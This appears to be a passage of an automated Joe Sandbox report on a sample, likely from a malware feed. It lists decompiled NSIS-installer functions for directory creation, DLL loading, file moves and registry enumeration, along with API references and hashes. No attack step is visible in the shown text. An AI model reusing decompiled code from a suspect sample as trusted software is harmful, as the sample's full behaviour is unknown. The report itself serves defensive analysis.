                                                                                        				void* _t17;
                                                                                        				int _t23;
                                                                                        				void* _t25;
                                                                                        				signed char _t26;
                                                                                        				short _t28;
                                                                                        				short _t31;
                                                                                        				short* _t34;
                                                                                        				void* _t36;
                                                                                        
                                                                                        				_t28 = __ebx;
                                                                                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                        				_t17 = E00405EB7(_t16);
                                                                                        				_t32 = _t17;
                                                                                        				if(_t17 != __ebx) {
                                                                                        					do {
                                                                                        						_t34 = E00405E39(_t32, 0x5c);
                                                                                        						_t31 =  *_t34;
                                                                                        						 *_t34 = _t28;
                                                                                        						if(_t31 != _t28) {
                                                                                        							L5:
                                                                                        							_t25 = E00405AEB( *(_t36 + 8));
                                                                                        						} else {
                                                                                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                                        								goto L5;
                                                                                        							} else {
                                                                                        								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                                        							}
                                                                                        						}
                                                                                        						if(_t25 != _t28) {
                                                                                        							if(_t25 != 0xb7) {
                                                                                        								L9:
                                                                                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                        							} else {
                                                                                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                        								if((_t26 & 0x00000010) == 0) {
                                                                                        									goto L9;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						 *_t34 = _t31;
                                                                                        						_t32 = _t34 + 2;
                                                                                        					} while (_t31 != _t28);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                        					_push(0xfffffff5);
                                                                                        					E00401423();
                                                                                        				} else {
                                                                                        					E00401423(0xffffffe6);
                                                                                        					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                        					if(_t23 == 0) {
                                                                                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                        					}
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                                        				return 0;
                                                                                        			}











                                                                                        0x004015c1
                                                                                        0x004015c9
                                                                                        0x004015cc
                                                                                        0x004015d1
                                                                                        0x004015d5
                                                                                        0x004015d7
                                                                                        0x004015df
                                                                                        0x004015e1
                                                                                        0x004015e4
                                                                                        0x004015ea
                                                                                        0x00401604
                                                                                        0x00401607
                                                                                        0x004015ec
                                                                                        0x004015ec
                                                                                        0x004015ef
                                                                                        0x00000000
                                                                                        0x004015fa
                                                                                        0x004015fd
                                                                                        0x004015fd
                                                                                        0x004015ef
                                                                                        0x0040160e
                                                                                        0x00401615
                                                                                        0x00401624
                                                                                        0x00401624
                                                                                        0x00401617
                                                                                        0x0040161a
                                                                                        0x00401622
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401622
                                                                                        0x00401615
                                                                                        0x00401627
                                                                                        0x0040162b
                                                                                        0x0040162c
                                                                                        0x004015d7
                                                                                        0x00401634
                                                                                        0x00401663
                                                                                        0x004022f1
                                                                                        0x00401636
                                                                                        0x00401638
                                                                                        0x00401645
                                                                                        0x0040164d
                                                                                        0x00401655
                                                                                        0x0040165b
                                                                                        0x0040165b
                                                                                        0x00401655
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                          • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 1892508949-670666241
                                                                                        • Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                                        • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                        • Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                                        • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 60%
                                                                                        			E004020D8(void* __ebx, void* __eflags) {
                                                                                        				struct HINSTANCE__* _t23;
                                                                                        				struct HINSTANCE__* _t31;
                                                                                        				void* _t32;
                                                                                        				WCHAR* _t35;
                                                                                        				intOrPtr* _t36;
                                                                                        				void* _t37;
                                                                                        				void* _t39;
                                                                                        
                                                                                        				_t32 = __ebx;
                                                                                        				asm("sbb eax, 0x434fc0");
                                                                                        				 *(_t39 - 4) = 1;
                                                                                        				if(__eflags < 0) {
                                                                                        					_push(0xffffffe7);
                                                                                        					L15:
                                                                                        					E00401423();
                                                                                        					L16:
                                                                                        					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t35 = E00402DA6(0xfffffff0);
                                                                                        				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                        				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                        					L3:
                                                                                        					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                        					_t47 = _t23 - _t32;
                                                                                        					 *(_t39 + 8) = _t23;
                                                                                        					if(_t23 == _t32) {
                                                                                        						_push(0xfffffff6);
                                                                                        						goto L15;
                                                                                        					}
                                                                                        					L4:
                                                                                        					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                        					if(_t36 == _t32) {
                                                                                        						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                        					} else {
                                                                                        						 *(_t39 - 4) = _t32;
                                                                                        						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                        							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                        						} else {
                                                                                        							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                        							if( *_t36() != 0) {
                                                                                        								 *(_t39 - 4) = 1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                                        						FreeLibrary( *(_t39 + 8));
                                                                                        					}
                                                                                        					goto L16;
                                                                                        				}
                                                                                        				_t31 = GetModuleHandleW(_t35); // executed
                                                                                        				 *(_t39 + 8) = _t31;
                                                                                        				if(_t31 != __ebx) {
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				goto L3;
                                                                                        			}










                                                                                        0x004020d8
                                                                                        0x004020d8
                                                                                        0x004020dd
                                                                                        0x004020e4
                                                                                        0x004021a3
                                                                                        0x004022f1
                                                                                        0x004022f1
                                                                                        0x00402c2a
                                                                                        0x00402c2d
                                                                                        0x00402c39
                                                                                        0x00402c39
                                                                                        0x004020f3
                                                                                        0x004020fd
                                                                                        0x00402100
                                                                                        0x00402110
                                                                                        0x00402114
                                                                                        0x0040211a
                                                                                        0x0040211c
                                                                                        0x0040211f
                                                                                        0x0040219c
                                                                                        0x00000000
                                                                                        0x0040219c
                                                                                        0x00402121
                                                                                        0x0040212c
                                                                                        0x00402130
                                                                                        0x00402170
                                                                                        0x00402132
                                                                                        0x00402135
                                                                                        0x00402138
                                                                                        0x00402164
                                                                                        0x0040213a
                                                                                        0x0040213d
                                                                                        0x00402146
                                                                                        0x00402148
                                                                                        0x00402148
                                                                                        0x00402146
                                                                                        0x00402138
                                                                                        0x00402178
                                                                                        0x00402191
                                                                                        0x00402191
                                                                                        0x00000000
                                                                                        0x00402178
                                                                                        0x00402103
                                                                                        0x0040210b
                                                                                        0x0040210e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00403418), ref: 004055FA
                                                                                          • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll), ref: 0040560C
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 334405425-0
                                                                                        • Opcode ID: 6e833e9dfbd4f8185cbafe9a8d763299a8377b070d9b9c984b500f91f6c30e1a
                                                                                        • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                        • Opcode Fuzzy Hash: 6e833e9dfbd4f8185cbafe9a8d763299a8377b070d9b9c984b500f91f6c30e1a
                                                                                        • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00401B9B(void* __ebx) {
                                                                                        				intOrPtr _t8;
                                                                                        				void* _t9;
                                                                                        				void _t12;
                                                                                        				void* _t14;
                                                                                        				void* _t22;
                                                                                        				void* _t25;
                                                                                        				void* _t30;
                                                                                        				char* _t32;
                                                                                        				void* _t33;
                                                                                        				void* _t34;
                                                                                        				void* _t37;
                                                                                        
                                                                                        				_t28 = __ebx;
                                                                                        				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                                                        				_t33 =  *0x40ce50; // 0x5db738
                                                                                        				if(_t8 == __ebx) {
                                                                                        					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                                                        						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                                        						_t34 = _t9;
                                                                                        						_t5 = _t34 + 4; // 0x4
                                                                                        						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                                                        						_t12 =  *0x40ce50; // 0x5db738
                                                                                        						 *_t34 = _t12;
                                                                                        						 *0x40ce50 = _t34;
                                                                                        					} else {
                                                                                        						if(_t33 == __ebx) {
                                                                                        							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                        						} else {
                                                                                        							_t3 = _t33 + 4; // 0x5db73c
                                                                                        							E0040653D(_t30, _t3);
                                                                                        							_push(_t33);
                                                                                        							 *0x40ce50 =  *_t33;
                                                                                        							GlobalFree();
                                                                                        						}
                                                                                        					}
                                                                                        					goto L15;
                                                                                        				} else {
                                                                                        					while(1) {
                                                                                        						_t8 = _t8 - 1;
                                                                                        						if(_t33 == _t28) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t33 =  *_t33;
                                                                                        						if(_t8 != _t28) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							if(_t33 == _t28) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t36 = _t33 + 4;
                                                                                        								_t32 = L"Call";
                                                                                        								E0040653D(_t32, _t33 + 4);
                                                                                        								_t22 =  *0x40ce50; // 0x5db738
                                                                                        								E0040653D(_t36, _t22 + 4);
                                                                                        								_t25 =  *0x40ce50; // 0x5db738
                                                                                        								_push(_t32);
                                                                                        								_push(_t25 + 4);
                                                                                        								E0040653D();
                                                                                        								L15:
                                                                                        								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
                                                                                        								_t14 = 0;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L17;
                                                                                        					}
                                                                                        					_push(0x200010);
                                                                                        					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                                        					E00405B9D();
                                                                                        					_t14 = 0x7fffffff;
                                                                                        				}
                                                                                        				L17:
                                                                                        				return _t14;
                                                                                        			}














                                                                                        0x00401b9b
                                                                                        0x00401b9b
                                                                                        0x00401b9e
                                                                                        0x00401ba6
                                                                                        0x00401bef
                                                                                        0x00401c1d
                                                                                        0x00401c26
                                                                                        0x00401c28
                                                                                        0x00401c2c
                                                                                        0x00401c31
                                                                                        0x00401c36
                                                                                        0x00401c38
                                                                                        0x00401bf1
                                                                                        0x00401bf3
                                                                                        0x0040292e
                                                                                        0x00401bf9
                                                                                        0x00401bf9
                                                                                        0x00401bfe
                                                                                        0x00401c05
                                                                                        0x00401c06
                                                                                        0x00401c0b
                                                                                        0x00401c0b
                                                                                        0x00401bf3
                                                                                        0x00000000
                                                                                        0x00401ba8
                                                                                        0x00401ba8
                                                                                        0x00401ba8
                                                                                        0x00401bab
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401bb1
                                                                                        0x00401bb5
                                                                                        0x00000000
                                                                                        0x00401bb7
                                                                                        0x00401bb9
                                                                                        0x00000000
                                                                                        0x00401bbf
                                                                                        0x00401bbf
                                                                                        0x00401bc2
                                                                                        0x00401bc9
                                                                                        0x00401bce
                                                                                        0x00401bd8
                                                                                        0x00401bdd
                                                                                        0x00401be2
                                                                                        0x00401be6
                                                                                        0x00402a94
                                                                                        0x00402c2a
                                                                                        0x00402c2d
                                                                                        0x00402c33
                                                                                        0x00402c33
                                                                                        0x00401bb9
                                                                                        0x00000000
                                                                                        0x00401bb5
                                                                                        0x0040238a
                                                                                        0x00402397
                                                                                        0x00402398
                                                                                        0x0040239d
                                                                                        0x0040239d
                                                                                        0x00402c35
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32(005DB738), ref: 00401C0B
                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000), ref: 00406779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFreelstrcatlstrlen
                                                                                        • String ID: Call
                                                                                        • API String ID: 3292104215-1824292864
                                                                                        • Opcode ID: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
                                                                                        • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                        • Opcode Fuzzy Hash: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
                                                                                        • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004022FF(void* __eflags) {
                                                                                        				WCHAR* _t34;
                                                                                        				WCHAR* _t37;
                                                                                        				WCHAR* _t39;
                                                                                        				void* _t41;
                                                                                        
                                                                                        				_t39 = E00402DA6(_t34);
                                                                                        				_t37 = E00402DA6(0x11);
                                                                                        				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
                                                                                        				if(E00406873(_t39) != 0) {
                                                                                        					 *(_t41 - 0x70) =  *(_t41 - 8);
                                                                                        					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
                                                                                        					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
                                                                                        					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
                                                                                        					_t27 =  *((intOrPtr*)(_t41 + 8));
                                                                                        					 *(_t41 - 0x68) = _t39;
                                                                                        					 *(_t41 - 0x64) = _t37;
                                                                                        					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
                                                                                        					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
                                                                                        					E0040559F(_t34, _t27);
                                                                                        					if(SHFileOperationW(_t41 - 0x70) != 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L1:
                                                                                        					E0040559F(0xfffffff9, _t34); // executed
                                                                                        					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
                                                                                        				return 0;
                                                                                        			}







                                                                                        0x00402307
                                                                                        0x00402310
                                                                                        0x00402318
                                                                                        0x00402322
                                                                                        0x00402335
                                                                                        0x00402338
                                                                                        0x00402345
                                                                                        0x0040234f
                                                                                        0x00402354
                                                                                        0x0040235d
                                                                                        0x00402360
                                                                                        0x00402363
                                                                                        0x00402366
                                                                                        0x0040236a
                                                                                        0x0040237b
                                                                                        0x00000000
                                                                                        0x00402381
                                                                                        0x00402324
                                                                                        0x00402324
                                                                                        0x00402327
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                          • Part of subcall function 00406873: FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                          • Part of subcall function 00406873: FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                        • lstrlenW.KERNEL32 ref: 0040233F
                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040234A
                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                        • String ID:
                                                                                        • API String ID: 1486964399-0
                                                                                        • Opcode ID: 9a68a55590cdbc49e093b1ff0954ec6e3e9e6f0d69c6d92c0435d44f9c0a3784
                                                                                        • Instruction ID: 04a4b26c59b21466d08f766bca7c88c70db01468de87939535198cd3568d8cbb
                                                                                        • Opcode Fuzzy Hash: 9a68a55590cdbc49e093b1ff0954ec6e3e9e6f0d69c6d92c0435d44f9c0a3784
                                                                                        • Instruction Fuzzy Hash: 40115A71D00314AADB10EFBAD949A9EB6B8AF04354F10843BA405FB2C1E6BCC9408B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                        			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                        				void* _t9;
                                                                                        				int _t10;
                                                                                        				long _t13;
                                                                                        				int* _t16;
                                                                                        				intOrPtr _t21;
                                                                                        				short* _t22;
                                                                                        				void* _t24;
                                                                                        				void* _t26;
                                                                                        				void* _t29;
                                                                                        
                                                                                        				_t22 = __edi;
                                                                                        				_t21 = __edx;
                                                                                        				_t16 = __ebx;
                                                                                        				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                                                        				_t24 = _t9;
                                                                                        				_t10 = E00402D84(3);
                                                                                        				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                        				 *__edi = __ebx;
                                                                                        				if(_t24 == __ebx) {
                                                                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                        				} else {
                                                                                        					 *(_t26 + 8) = 0x3ff;
                                                                                        					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                        						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                                        						__eflags = _t13;
                                                                                        						if(_t13 != 0) {
                                                                                        							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                        						}
                                                                                        					} else {
                                                                                        						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                        					}
                                                                                        					_t22[0x3ff] = _t16;
                                                                                        					_push(_t24); // executed
                                                                                        					RegCloseKey(); // executed
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                                        				return 0;
                                                                                        			}












                                                                                        0x0040259e
                                                                                        0x0040259e
                                                                                        0x0040259e
                                                                                        0x004025a3
                                                                                        0x004025aa
                                                                                        0x004025ac
                                                                                        0x004025b4
                                                                                        0x004025b7
                                                                                        0x004025ba
                                                                                        0x0040292e
                                                                                        0x004025c0
                                                                                        0x004025c8
                                                                                        0x004025cb
                                                                                        0x004025e4
                                                                                        0x004025ea
                                                                                        0x004025ec
                                                                                        0x004025ee
                                                                                        0x004025ee
                                                                                        0x004025cd
                                                                                        0x004025d1
                                                                                        0x004025d1
                                                                                        0x004025f5
                                                                                        0x004025fc
                                                                                        0x004025fd
                                                                                        0x004025fd
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                        • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiF917.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$CloseValue
                                                                                        • String ID:
                                                                                        • API String ID: 397863658-0
                                                                                        • Opcode ID: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
                                                                                        • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                        • Opcode Fuzzy Hash: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
